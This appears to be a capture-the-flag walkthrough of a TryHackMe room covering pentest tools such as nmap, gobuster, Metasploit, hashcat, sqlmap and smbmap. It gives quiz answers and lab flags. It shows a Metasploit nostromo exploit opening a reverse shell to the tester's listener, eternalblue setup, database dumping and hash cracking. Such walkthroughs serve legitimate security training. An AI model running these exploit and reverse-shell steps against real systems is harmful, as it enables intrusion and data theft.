In this writeup Today we're going to try to Solve a room in THM called CC: Pen Testing
This Section is a Introduction about the room
no answer needed
This Section Called Nmap in this Section You Will Use Nmap to Scan & Recon The Machine
Nmap is one of the most important tools for pentesting, if you don't know Nmap use man command in linux or you can ask google
search bro
$ man nmap
It will show you everything about nmap
#1. What does nmap stand for ?
answer : Network Mapper
#2. How do you specify which port(s) to scan ?
answer : -p
#3. How do you do a "ping scan"(just tests if the host(s) is up) ?
answer: -sn
#4. What is the flag for a UDP scan ?
answer: -sU
#5. How do you run default scripts ?
answer: -sC
#6. How do you enable "aggressive mode"(Enables OS detection, version detection, script scanning, and traceroute) ?
answer : -A
#7. What flag enables OS detection ?
answer : -O
#8. How do you get the versions of services running on the target machine
answer : -sV
#9. Deploy the machine
answer : (Deploy the machine (No answer needed )
after that run $ nmap -A -sC -sV -O <IP Address>
#10. How many ports are open on the machine ?
answer : 1
#11. What service is running on the machine ?
answer : apache
#12. What is the version of the service ?
answer : 2.4.18
#13. What is the output of the http-title script(included in default scripts) ?
answer : Apache2 Ubuntu Default Page: It Works
This Section Called NetCat in this Section You Will Use NetCat it's allows users to connect to specific ports and send and receive data
if you don't know it you can use man command in linux or you can ask google
#1. How do you listen for connections ?
answer: -l
#2. How do you enable verbose mode(allows you to see who connected to you) ?
answer: -v
#3. How do you specify a port to listen on ?
answer : -p
#4. How do you specify which program to execute after you connect to a host(One of the most infamous) ?
answer : -e
#5. How do you connect to udp ports ?
answer -u
you can download gobuster form here
gobuster can tell you where some files and directories are; however, some of the more hidden stuff is often hidden away from the eyes of users.
#1. How do you specify directory/file brute forcing mode ?
answer : dir
#2. How do you specify dns bruteforcing mode ?
answer : dns
#3. What flag sets extensions to be used ?
answer : -x
#4. What flag sets a wordlist to be used ?
answer : -w
#5. How do you set the Username for basic authentication ?
answer : -u
#6. How do you set the Password for basic authentication ?
answer : -p
#7. How do you set which status codes gobuster will interpret as valid ?
answer : -s
#8. How do you skip ssl certificate verification ?
answer : -K
#9.How do you specify a User-Agent ?
answer : -A
#10. How do you specify a HTTP header ?
answer : -h
#11. What flag sets the URL to bruteforce ?
answer : -u
#12. Deploy the machine
answer : no answer needed
#13. What is the name of the hidden directory ?
$ sudo gobuster dir -u http://10.10.238.53 -w /usr/share/wordlists/dirb/common.txt -t 64 -x xxa
answer : secret
#14. What is the name of the hidden file with the extension xxa ?
answer : password
nikto is a popular web scanning tool that allows users to find common web vulnerabilities. It is commonly used to check for common CVE's such as shellshock, and to get general information about the web server that you're enumerating.
use man command to know about it
$ man nikto
#1. How do you specify which host to use ?
answer : -h
#2. What flag disables ssl?
answer : -nossl
#3. How do you force ssl?
answer : -ssl
#4 How do you specify authentication(username + pass)?
answer : -id
#5. How do you select which plugin to use?
answer : -plugins
#6. Which plugin checks if you can enumerate apache users ?
run └─ $ nikto --list-plugins
answer : apacheusers
#7. How do you update the plugin list ?
answer : -update
#8. How do you list all possible plugins to use ?
answer : --list-plugins
#1.
Metasploit is one of the most popular penetration testing frameworks around. It contains a large database of almost every major CVE, which you can easily use against a machine. The aim of this section is to go through some of the major features of metasploit, and at the end there will be a machine that you will need to exploit.
No answer needed
#1. What command allows you to search modules?
answer : search
#2.How do you select a module?
answer : use
#3.** How do you display information about a specific module?**
answer : info
#4. How do you list options that you can set ?
answer : options
#5. What command lets you view advanced options for a specific module ?
answer: advanced
#6. How do you show options in a specific category ?
answer : show
Once you have found the module for the specific machine that you want to exploit, you need to select it and set the proper options. This task will take you through selecting and setting options for one of the most popular metasploit modules "eternalblue". All basic commands that could be run before selecting a module can also be done while a module is selected.
#1. How do you select the eternalblue module?
answer : use exploit/windows/smb/ms17_010_eternalblue
#2. What option allows you to select the target host(s)?
answer : RHOSTS
#3. How do you set the target port ?
answer : RPORT
#4. What command allows you to set options ?
answer : set
#5. How would you set SMBPass to "username"?
answer : set SMBPass username
#6. How would you set the SMBUser to "password"?
answer : set SMBUser password
#7. What option sets the architecture to be exploited ?
answer : arch
#8. What option sets the payload to be sent to the target machine ?
answer : payload
#9. Once you've finished setting all the required options, how do you run the exploit ?
answer : exploit
#10 . What flag do you set if you want the exploit to run in the background ?
answer: -j
#11. How do you list all current sessions ?
answer : sessions
#12. What flag allows you to go into interactive mode with a session("drops you either into a meterpreter or regular shell")
answer : -i
Once you've run the exploit, ideally it will give you one of two things, a regular command shell or a meterpreter shell. Meterpreter is metasploits own "control center" where you can do various things to interact with the machine. A list of commonmeterpreter commands and their uses can be found here
#1. What command allows you to download files from the machine ?
answer : download
#2. What command allows you to upload files to the machine?
answer : upload
#3. How do you list all running processes ?
answer : ps
#4. How do you change processes on the victim host(Ideally it will allow you to change users and gain the perms associated with that user) ?
answer : migrate
#5. What command lists files in the current directory on the remote machine?
answer : ls
#6. How do you execute a command on the remote host?
answer : execute
#7. How do you find files on the target host(Similar function to the linux command "find")
answer : search
#8. How do you get the output of a file on the remote host ?
answer : cat
#9. How do you put a meterpreter shell into "background mode"(allows you to run other msf modules while also keeping the meterpreter shell as a session)?
answer : background
in this task will exploite the machine
msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 80
RPORT => 80
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS10.10.125.158
RHOSTS => 10.10.125.158
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.2.68.221
LHOST => 10.2.68.221
msf5 exploit(multi/http/nostromo_code_exec) > run
[*] Started reverse TCP handler on 10.2.68.221:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.2.68.221:4444 -> 10.10.125.158:51754) at 2021-3-2 07:12:44-0400
shell
id
#1. Select the module that needs to be exploited
answer : use exploit/multi/http/nostromo_code_exec
#2. What variable do you need to set, to select the remote host
answer : rhosts
#3 How do you set the port to 80
answer : set port
#4. How do you set listening address(Your machine)?
answer : lhost
#5. Exploit the machine!
#6. What is the name of the secret directory in the /var/nostromo/htdocs directory ?
answer : s3cretd1r
#7. What are the contents of the file inside of the directory ?
$ cd s3cretdir
$ ls
nice
$ cat nice
Woohoo!
answer : Woohoo!
I want to say the important thing is that there are many ways to crack the hash you can use a website,brute force tool it's the same result no problem
Often times during a pen test, you will gain access to a database. When you investigate the database you will often find a users table, which contains usernames and often hashed passwords. It is often necessary to know how to crack hashed passwords to gain authentication to a website(or if you're lucky a hashed password may work for ssh!).
No answer needed
hashcat is another one of the most popular hash cracking tools. It is renowned for its versatility and speed. Hashcat does not have auto detection for hashtypes, instead it has modes. For example if you were trying to crack an md5 hash the "mode" would be 0, while if you were trying to crack a sha1 hash, the mode would be 100.
A full list of all modes can be found here.
#1. What flag sets the mode ?
answer : -m
#2. What flag sets the "attack mode"
answer : -a
#3. What is the attack mode number for Brute-force
answer: 3
#4, What is the mode number for SHA3-512
answer : 17600
#5. Crack This Hash:56ab24c15b72a457069c5ea42fcfc640
type : MD5
You can user this site
answer : happy
Crack this hash: 4bc9ae2b9236c2ad02d81491dcb51d5f
answer : nootnoot
Type: MD4
John The Ripper(jtr) is one of the best hash cracking tools available. It supports numerous formats of hashes and is extremely easy to use, while having a lot of options for customization.
Note: There are multiple variations of jtr out there. For this task the version that comes pre-installed on kali will be used
Note 2: All hashes can be cracked with rockyou.txt
Download From here
#1.What flag let's you specify which wordlist to use?
answer : --wordlist
#2, What flag lets you specify which hash format(Ex: MD5,SHA1 etc.) to use?
answer : -format
#3. ** How do you specify which rule to use?**
answer : --rules
Crack this hash: 5d41402abc4b2a76b9719d911017c592
Type: MD5
Note : as I told you, you can use more than one way to crack the hash. This hash is easy, so I will find it in the crack station
answer : hello
Crack this hash: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
Type: SHA1
answer : password
no answer need
#1. How do you specify which url to check?
answer :-u
#2. What about which google dork to use?
answer: -g
#3. How do you select(lol) which parameter to use?(Example: in the url http://ex.com?test=1 the parameter would be test.)
answer : -p
#4. What flag sets which database is in the target host’s backend? (Example: If the flag is set to mysql then sqlmap will only test mysql injections)
answer: --dbms
#5. How do you select the level of depth sqlmap should use? (Higher = more accurate and more tests in general)
answer : --level
#6. How do you dump the table entries of the database?
answer :--dump
#7. Which flag sets which db to enumerate? (Case sensitive)
answer: -D
#8. Which flag sets which table to enumerate? (Case sensitive)
answer: -T
No answer needed
#1. Set the url to the machine ip, and run the command
no answer needed
#2. How many types of sqli is the site vulnerable to ?
answer : 3
#3. Dump the database
no answer needed
sqlmap -u http://<Maching ip> --forms --dump
#4. What is the name of the database ?
answer : tests
#5. How many tables are in the database ?
answer : 2
#6. What is the value of the flag ?
answer found_me
Continuing with the trend of tools having "map" in the name being extremely popular, smbmap is one of the best ways to enumerate samba. smbmap allows pen-testers to run commands(given proper permissions), download and upload files, and overall is just incredibly useful for smb enumeration.
#1. How do you set the username to authenticate with?
answer : -u
#2. What about the password?
answer : -p
#3. How do you set the host?
answer : -h
#4. What flag runs a command on the server(assuming you have permissions that is)?
answer : -x
#5. How do you specify the share to enumerate?
answer : -s
#6. How do you set which domain to enumerate?
answer : -d
#7. What flag downloads a file?
answer : --download
#8.What about uploading one?
answer : --upload
#9. Given the username "admin", the password "password", and the ip "10.10.10.10", how would you run ipconfig on that machine
answer : smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"
smbclient allows you to do most of the things you can do with smbmap, and it also offers you and interactive prompt.
#1. How do you specify which domain(workgroup) to use when connecting to the host?
answer : -w
#2. How do you specify the ip address of the host?
answer : -l
#3. How do you run the command "ipconfig" on the target machine?
answer :-c "ipconfig"
#4. How do you specify the username to authenticate with?
answer : -U
#5. How do you specify the password to authenticate with?
answer : -P
#6. What flag is set to tell smbclient to not use a password?
answer : -N
#7. While in the interactive prompt, how would you download the file test, assuming it was in the current directory?
answer : get test
#8. In the interactive prompt, how would you upload your /etc/hosts file
answer : put /etc/hosts
no answer needed
no answer needed
let's goo
What is the user.txt
okay we will see the hint
He is referring to the hidden dir that you found by gobuster that : /secret
we have to use search the directory with gobuster tool
lets search
gobuster dir -u http://Machinieip -w /usr/share/wordlists/dirb/common.txt -t 64
Now we will search for a file with multiple extensions in this directory
gobuster dir -u http://10.10.208.250/secret -w /usr/share wordlists/dirb/common.txt -t 64 -x .txt,.html,.pdf
and we found it
Note : the ip of the machine has been changed because the machine was turned off
let's go to the
http://10.10.208.250/secret/secret.txt
and we find that
nyan:046385855FC9580393853D8E81F240B66FE9A7B8
This is hash
okay decrypt it by any tool john - hashcat - website as you like
i will use the faster way and search it in crack station
046385855FC9580393853D8E81F240B66FE9A7B8 = nyan
We have not reached anything so let's check the services and port activated in the machine by Nmap
found 2 ports: 22,80
i think ssh is running in the machine
let's connect
password is the hash value
the user flag is supernootnoot
What is the root.txt
root flag is : congratulations!!!!